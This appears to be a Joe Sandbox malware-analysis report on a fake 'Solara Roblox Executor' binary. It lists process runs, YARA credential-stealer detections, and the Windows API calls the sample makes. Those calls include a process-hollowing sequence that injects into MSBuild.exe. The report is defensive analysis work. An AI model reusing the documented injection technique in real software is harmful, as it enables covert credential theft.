2024-12-31 16:23:17 UTC	1137	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:23:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d53t328a3oimps4v9g2an7g788; expires=Sat, 26 Apr 2025 10:09:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBfiw34vZVJJ6vvWNYUCU2FUrqR2RxqCgLVjZAMGkCYeOm9f%2Bs8gWsrJPs%2BWnYKdOKpn9NZXuaIVmI0bDDMhPt7jxVnmJWzxK4%2F8ygndqTC6GGGzFlsAovrftVzRAcMchrzNjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9cf18db91a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1968&rtt_var=749&sent=346&recv=587&lost=0&retrans=0&sent_bytes=2843&recv_bytes=570423&delivery_rate=1449851&cwnd=157&unsent_bytes=0&cid=8ad3c6a1387fe6ef&ts=2664&x=0"

Target ID:	0
Start time:	11:23:04
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Imagebase:	0x2f0000
File size:	814'592 bytes
MD5 hash:	D2B09B1BDA10143724A24534E31D44DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:23:04
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:23:05
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Imagebase:	0x2f0000
File size:	814'592 bytes
MD5 hash:	D2B09B1BDA10143724A24534E31D44DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:23:05
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Imagebase:	0x2f0000
File size:	814'592 bytes
MD5 hash:	D2B09B1BDA10143724A24534E31D44DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:23:05
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Imagebase:	0x2f0000
File size:	814'592 bytes
MD5 hash:	D2B09B1BDA10143724A24534E31D44DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:23:05
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Imagebase:	0x2f0000
File size:	814'592 bytes
MD5 hash:	D2B09B1BDA10143724A24534E31D44DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2093656620.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	29

Executed Functions

Function 0032019E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00320110,00320100), ref: 00320334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00320347
Wow64GetThreadContext.KERNEL32(00000110,00000000), ref: 00320365
ReadProcessMemory.KERNELBASE(0000010C,?,00320154,00000004,00000000), ref: 00320389
VirtualAllocEx.KERNELBASE(0000010C,?,?,00003000,00000040), ref: 003203B4
TerminateProcess.KERNELBASE(0000010C,00000000), ref: 003203D3
WriteProcessMemory.KERNELBASE(0000010C,00000000,?,?,00000000,?), ref: 0032040C
WriteProcessMemory.KERNELBASE(0000010C,00400000,?,?,00000000,?,00000028), ref: 00320457
WriteProcessMemory.KERNELBASE(0000010C,?,?,00000004,00000000), ref: 00320495
Wow64SetThreadContext.KERNEL32(00000110,02750000), ref: 003204D1
ResumeThread.KERNELBASE(00000110), ref: 003204E0

Strings

VirtualAllocEx, xrefs: 0032029C
GetThreadContext, xrefs: 00320276
ResumeThread, xrefs: 003202D8
ReadProcessMemory, xrefs: 00320289
Load, xrefs: 003201DA
TerminateProcess, xrefs: 003203C3
ress, xrefs: 00320226
VirtualAlloc, xrefs: 00320263
CreateProcessW, xrefs: 00320250
SetThreadContext, xrefs: 003202C2
WriteProcessMemory, xrefs: 003202AF
GetP, xrefs: 0032021E
aryA, xrefs: 003201E2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00320333

Memory Dump Source

Source File: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: 305fd8aa5df333804a0bf0fd0007672b12b645dee6af9deb3cd8ab8689f5bee8
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: F0B11A7660024AAFDB60CF68CC80BDA73A5FF88714F158524EA0CAB342D770FA55CB94

Function 002F1C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 002F1C3B
CreateFileA.KERNELBASE ref: 002F1C94
GetFileSize.KERNEL32 ref: 002F1CC3
CloseHandle.KERNEL32 ref: 002F1CDF

Strings

CreateFileA, xrefs: 002F1C2E

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: File$AddressCloseCreateHandleProcSize
String ID: CreateFileA
API String ID: 2547132502-1429953656
Opcode ID: 66a3620b4751056ed5221200ed29f7dc21a8f7d613c8f31eb845318556bb3012
Instruction ID: bedc6e20c0689bbde8d745d213f420aa8c0adedb6f72d0820bfd4c0fdedde267
Opcode Fuzzy Hash: 66a3620b4751056ed5221200ed29f7dc21a8f7d613c8f31eb845318556bb3012
Instruction Fuzzy Hash: 2341B3B0D18209DFDB00EFA8D4986AEBBF0EF48354F00852DE899A7350D7759959CF92

Function 00306642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,9B9A4FEF,?,00306751,00000000,00000000,00000000,00000000), ref: 00306703

Strings

api-ms-, xrefs: 00306699
ext-ms-, xrefs: 003066AD

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 51d559aac10d1bcf0345f83014e65bc3a103dcbeb0f29ca8f01c64a005c81121
Instruction ID: bd08ebe80ec6e7023f5fcdfb512efd8b01ced730dba88331c8ab5d829bd6a833
Opcode Fuzzy Hash: 51d559aac10d1bcf0345f83014e65bc3a103dcbeb0f29ca8f01c64a005c81121
Instruction Fuzzy Hash: 21212732A03218ABD7339B24DC62B9A336C9B45770F270124FD11A72D5EB32ED20C6E0

Function 002F20C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 002F20E6
GetProcAddress.KERNEL32 ref: 002F20FE
FreeConsole.KERNELBASE ref: 002F210D

Strings

kernel32.dll, xrefs: 002F20DD
FreeConsole, xrefs: 002F20F1

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AddressConsoleFreeHandleModuleProc
String ID: FreeConsole$kernel32.dll
API String ID: 1635486814-2564406000
Opcode ID: 723090d6281a1236e1593f80e06ffeacdeb3d252649b99507ae38d169b8bb457
Instruction ID: 5e37eb1cb4c5440cf06a1bbe27d7e5c0606912c9c190fad6ce9ae0b106405ce5
Opcode Fuzzy Hash: 723090d6281a1236e1593f80e06ffeacdeb3d252649b99507ae38d169b8bb457
Instruction Fuzzy Hash: D301B6709002089FCB01EFBCD94559DBBF8AB48300F40856AE849D7351EB34A6588F82

Function 00306E2A Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 00306EAF
__alloca_probe_16.LIBCMT ref: 00306F78
__freea.LIBCMT ref: 00306FDF

Part of subcall function 003056F1: RtlAllocateHeap.NTDLL(00000000,00307675,?,?,00307675,00000220,?,?,?), ref: 00305723

__freea.LIBCMT ref: 00306FF2
__freea.LIBCMT ref: 00306FFF

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: b041bf7020ecbe2d2aac9d7c67e65fca348672740b23ad46a3595970f15d7ae6
Instruction ID: a0a49f98b9bef3cccc85cf02c4617391e6f08627812d0c839875437a249a399e
Opcode Fuzzy Hash: b041bf7020ecbe2d2aac9d7c67e65fca348672740b23ad46a3595970f15d7ae6
Instruction Fuzzy Hash: C251C57260224BAFDB229F65DC62EBB7AADEF44750B160138FD04D6195EB31DC70CA60

Function 002F1DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 002F1E6E
VirtualProtect.KERNELBASE ref: 002F1EC3

Strings

@, xrefs: 002F1EB7
VirtualProtect, xrefs: 002F1E61

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AddressProcProtectVirtual
String ID: @$VirtualProtect
API String ID: 3759838892-29487290
Opcode ID: 57c81c4826d25edafc79ba8029b54e2bd2c6109a000f2b4b7a56dc50433d5bb3
Instruction ID: 6efb39f30c2a73682dc3d04930f98e1f595bd9538fc821bb548c1f70645aa7ba
Opcode Fuzzy Hash: 57c81c4826d25edafc79ba8029b54e2bd2c6109a000f2b4b7a56dc50433d5bb3
Instruction Fuzzy Hash: D941D2B0901209DFDB04DFA9D5986EEBBF4FF08354F108429E848AB351D7759949CF91

Function 002FF293 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(002FF1A0,?,002FF355,00000000,?,?,002FF1A0,9B9A4FEF,?,002FF1A0), ref: 002FF2A4
TerminateProcess.KERNEL32(00000000,?,002FF355,00000000,?,?,002FF1A0,9B9A4FEF,?,002FF1A0), ref: 002FF2AB
ExitProcess.KERNEL32 ref: 002FF2BD

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: caa51c2b9427df1eb80e1abaf65dff916434670695d7048f13905489f3d34f46
Instruction ID: 139811490e6bde9d1c33011cd02ef887984e1032062f40ba453740ae486ac73b
Opcode Fuzzy Hash: caa51c2b9427df1eb80e1abaf65dff916434670695d7048f13905489f3d34f46
Instruction Fuzzy Hash: DAD09E3201010CABCF462F60DD0D9A97F6DEF48791B548035BE1956071CF3699619E80

Function 0030D3A4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0030D74E: GetConsoleOutputCP.KERNEL32(9B9A4FEF,00000000,00000000,?), ref: 0030D7B1

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,002FD832,?,002FDA94), ref: 0030D529
GetLastError.KERNEL32(?,002FD832,?,002FDA94,?,002FDA94,?,?,?,?,?,?,?,00000000,?,?), ref: 0030D533

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f97a6fd32ce7d0721967298e59dd95e8fd1547f527bb299450a6504eceebf606
Instruction ID: 9331f4683c3dcd755214309f45d9d626233542a9acdf8e60dc5bd1754d514d60
Opcode Fuzzy Hash: f97a6fd32ce7d0721967298e59dd95e8fd1547f527bb299450a6504eceebf606
Instruction Fuzzy Hash: 3D619271D01119AFDF12CFE8CC94AEEBBF9AF49318F150189E904AB296D771D901CB60

Function 003072A8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003074AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 003074D8

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,003076B8,?,00000000,?,?,?), ref: 00307309
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,003076B8,?,00000000,?,?,?), ref: 00307345

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 9b78d9e358d19e7ea4cb75277510de0dd7652feb79432f73df4d9b8e822d4142
Instruction ID: cb1cf591b4dca71ea5dd5183e71dfec8262f05940f9e5425573108e88e53467e
Opcode Fuzzy Hash: 9b78d9e358d19e7ea4cb75277510de0dd7652feb79432f73df4d9b8e822d4142
Instruction Fuzzy Hash: F1513670E092459EDB22CF36C8A16AAFBF9EF44300F15806ED4868B191D774B946DB80

Function 0030DB7D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0030D50F,?,002FDA94,?,?,?,00000000), ref: 0030DC19
GetLastError.KERNEL32(?,0030D50F,?,002FDA94,?,?,?,00000000,?,?,?,?,?,002FD832,?,002FDA94), ref: 0030DC3F

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 591bee44b58bbc3d9cc16c3298ebdb5f7fafe2ccd99f0df5f42a1eaaa414eaee
Instruction ID: 97d3ae85a1e2ac91552f72cf62a72639826679bc06680a7ceff43ac0155dc894
Opcode Fuzzy Hash: 591bee44b58bbc3d9cc16c3298ebdb5f7fafe2ccd99f0df5f42a1eaaa414eaee
Instruction Fuzzy Hash: BC219130A112199FDB1ACF69DC90AE9B7F9EF88305F1440A9E906D7251D730DE46CF64

Function 00307192 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00307081,0031FCD8,0000000C), ref: 003071DE
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00307081,0031FCD8,0000000C), ref: 003071F0

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 1ea712bdbbf93370689142905d3e9c187bf47dafe0b0ac6bd5820546b3e3b799
Instruction ID: f0e93c91a8930994ef83ae0f47ccc1521d145affd6dc4b45fb428686c2db353a
Opcode Fuzzy Hash: 1ea712bdbbf93370689142905d3e9c187bf47dafe0b0ac6bd5820546b3e3b799
Instruction Fuzzy Hash: A111063190E7814AC7368E3E8CA86227A9CAB56370B390B5DE4B6865F1C630F846C690

Function 002F2010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 002F2038
GetModuleFileNameW.KERNEL32 ref: 002F2058

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Module$FileHandleName
String ID:
API String ID: 4146042529-0
Opcode ID: 26a928d1b395e2c4fd95762d2f08a9f30059e28fec36abd3a1cdac8f880cf5dc
Instruction ID: 81029d6d838eab0b4aa37356dcf7f9ab90240132f5565f97cfd98ef505784a07
Opcode Fuzzy Hash: 26a928d1b395e2c4fd95762d2f08a9f30059e28fec36abd3a1cdac8f880cf5dc
Instruction Fuzzy Hash: 4C012CB09053088FD715EF68D54529EBBF8BB08300F4044ADE899D3341EB305A888F52

Function 003064F3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00306F1A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00306527
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00306F1A,?,?,-00000008,?,00000000), ref: 00306545

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
